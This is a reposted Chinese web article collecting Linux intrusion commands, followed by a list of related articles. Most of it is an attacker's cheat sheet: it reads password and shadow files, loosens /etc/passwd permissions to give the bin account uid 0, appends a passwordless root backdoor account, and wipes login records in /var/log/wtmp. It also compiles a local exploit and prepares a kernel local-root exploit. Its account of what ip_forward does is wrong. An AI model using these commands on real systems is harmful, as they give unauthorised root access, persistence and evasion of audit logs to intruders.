linux 入侵常用命令汇编

转载  更新时间:2009年07月09日 23:51:28   作者:   我要评论

掌握这些命令也有助于配置linux的安全,大家可以看看。
cat /etc/passwd 查看linux用户

  cat /etc/shadow 查看用户密码需要root权限

  cat /etc/sysconfig/network-scripts/ifcfg-ethn N代表网卡号 查看所在网卡的ip信息

  ifconfig 查看本机ip信息

  cat /etc/resolv.conf 查看DNS信息

  bash -i 在反弹的shell中使用可以直观显示命令

  bash prompt: 当你以普通限权用户身份进入的时候,一般你会有一个类似bash$的prompt。当你以Root登陆时,你的prompt会变成

  bash#。

  系统变量 : 试着echo "$USER / $EUID" 系统应该会告诉你它认为你是什么用户。

  echo 1>/proc/sys/net/ipv4/if_forward是不是你写错了,应该是echo 1>/proc/sys/net/ipv4/ip_forward,

  vim /proc/sys/net/ipv4/ip_forward 吧,默认是0,也就是内核不进行数据包过滤,改为1 ,让内核对数据包进行filter处理!

  netstat -an |grep LISTEN |grep :80 查看端口

  service --status-all | grep running

  service --status-all | grep http

  查看运行服务

  lsb_release -a 查看系统版本

  重启ssh服务 :/usr/sbin/sshd stop

  /usr/sbin/sshd start

  ssd_config文件里

  PasswordAuthentication no,

  将其改为

  PasswordAuthentication yes

  远程ssh才可登录

  否则显示Access denied

  其中Usepam yes可能用来建立pam方式login,比如从其它linux主机ssh到服务端,如果关闭,则不能打开.

  su的菜鸟用法

  先chomod 777 /etc/passwd

  然后修改bin用户的gid和uid为0

  然后passwd设置bin的密码

  然后cp /bin/bash /sbin/nologin

  然后su的时候su - bin就可以到rootshell了。

  这个原理就是当ssh不允许root用ssh终端登陆的时候,我们又不知道root密码,的一种很菜鸟的做法

  还可以这样

  sed -i s/bin:x:1:1/bin:x:0:1/g /etc/passwd

  gcc prtcl2.c –o local –static –Wall

  echo "nosec:x:0:0::/:/bin/sh" >> /etc/passwd

  echo "nosec::-1:-1:-1:-1:-1:-1:500" >> /etc/shadow

  清空last记录 cp /dev/null /var/log/wtmp

  -----

  dd if=/dev/zero of=yourfile bs=10M count=10 建立一个100m的大文件在利用Linux Kernel <= 2.6.17.4 (proc) Local Root Exploit提权的时候要用到的。

相关文章

  • 2016年如何选择Linux发行版

    2016年如何选择Linux发行版

    这篇文章主要介绍了2016年选择Linux发行版的标准和原则,挑选几个将在2016 年里大放光彩的最佳发行版给大家介绍一下,感兴趣的小伙伴们可以参考一下
    2016-02-02
  • 分别在Linux和Windows下设置JVM内存的简单方法

    分别在Linux和Windows下设置JVM内存的简单方法

    下面小编就为大家带来一篇分别在Linux和Windows下设置JVM内存的简单方法。小编觉得挺不错的,现在就分享给大家,也给大家做个参考。一起跟随小编过来看看吧
    2017-01-01
  • linux Apache CGI 安装配置

    linux Apache CGI 安装配置

    Apache 中的提交了一种利用扩展应用程序执行动态网页的机制. 称为Common Gateway Interface (通用网关接口)简称CGI.
    2009-05-05
  • shiro会话管理示例代码

    shiro会话管理示例代码

    Shiro提供了完整的企业级会话管理功能,不依赖于底层容器(如web容器tomcat),直接使用Shiro的会话管理可以直接替换如Web容器的会话管理
    2017-09-09
  • 详解centos7上elastic search安装及填坑记

    详解centos7上elastic search安装及填坑记

    本篇文章主要介绍了centos7上elastic search安装及填坑记,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
    2018-01-01
  • expect命令在linux下实现批量ssh免密

    expect命令在linux下实现批量ssh免密

    本次文章主要给大家讲解了在linux系统下用expect命令实现批量ssh免密的实现方法,以及实际代码分享。
    2017-11-11
  • linux查看主板内存槽与内存信息的命令dmidecode方法

    linux查看主板内存槽与内存信息的命令dmidecode方法

    下面小编就为大家带来一篇linux查看主板内存槽与内存信息的命令dmidecode方法。小编觉得挺不错的,现在就分享给大家,也给大家做个参考。一起跟随小编过来看看吧
    2016-11-11
  • linux下SVN配置实现项目目录自动更新以及源码安装的操作方法

    linux下SVN配置实现项目目录自动更新以及源码安装的操作方法

    下面小编就为大家分享一篇linux下SVN配置实现项目目录自动更新以及源码安装的操作方法,具有很好的参考价值,希望对大家有所帮助。一起跟随小编过来看看吧
    2017-12-12
  • Ubuntu系统下安装ImageMagick出错的解决过程

    Ubuntu系统下安装ImageMagick出错的解决过程

    由于项目需要, 所以要在Ubuntu下面安装ImageMagick,但在安装过程中遇到了些问题,通过查找相关的资料最终得以解决了,所以下面这篇文章主要给大家介绍了关于Ubuntu系统下安装ImageMagick出错的解决过程,需要的朋友可以参考借鉴,下面来一起看看吧。
    2017-07-07
  • linux mint 18虚拟机下设置1080P分辨率的方法

    linux mint 18虚拟机下设置1080P分辨率的方法

    下面小编就为大家带来一篇linux mint 18虚拟机下设置1080P分辨率的方法。小编觉得挺不错的,现在就分享给大家,也给大家做个参考。一起跟随小编过来看看吧
    2016-12-12

最新评论